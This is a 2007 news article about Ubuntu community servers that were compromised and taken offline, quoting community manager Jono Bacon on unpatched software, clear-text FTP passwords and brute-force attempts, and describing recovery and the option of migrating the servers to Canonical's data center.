In an IRC (Internet relay chat) meeting of the Ubuntu collocation team this week, one member indicated that the source of the malicious attacks might have been a hacker using a Chinese IP address attempting to access the servers by brute force "for a long time now."
The servers, some of which were hosted by Canonical, the commercial sponsor of the Ubuntu project, were out of date, populated with various web software, and missing security patches, according to Ubuntu project leaders.
"An attacker could have gotten a shell through almost any of these sites" hosted on the downed servers, Ubuntu community manager Jono Bacon wrote in an online posting.
The community began to reboot the servers in a "safe state" this week in a attempt to begin recovering the data stored on them. safe state so that we could recover data from them.
"Unfortunately, the process was taking far longer than we would have hoped or liked due to a combination" of issues, Bacon wrote in the posting. The included "having to use remote hands, arbitrary limits imposed by those remote hands and (relative) lack of bandwidth to copy data off site."
"FTP (not sftp, without SSL) was being used to access the machines, so an attacker (in the right place) could also have gotten access by sniffing the clear-text passwords," he added. Also, "The servers have not been upgraded past breezy due to problems with the network card and later kernels. This probably allowed the attacker to gain root."
During the 14 August IRC meeting, the Ubuntu community gave location teams the option of migrating to the Canonical data center or remaining with the hosted/outsourced servers. The UK-based Canonical provides support, professional and engineering services, and hardware and software certification for the Ubuntu variant of the open source Linux operating system.
The benefits to moving to Canonical, noted Bacon, included better hardware and bandwidth and full time support from Canonical's sysadmin team, including software maintenance and integration into its existing backup infrastructure. The tradeoffs, on the other hand, included no root access, access by per-user
SSH key only, with a limited number of accounts per location, and software support restricted to a short list that includes the blogging platform Wordpress, the Ubuntu community forum Planet, and the wiki engine MoinMoin.
Compromised Ubuntu project servers used in attacks taken offline
By Jim Carr on Aug 20, 2007 6:09AM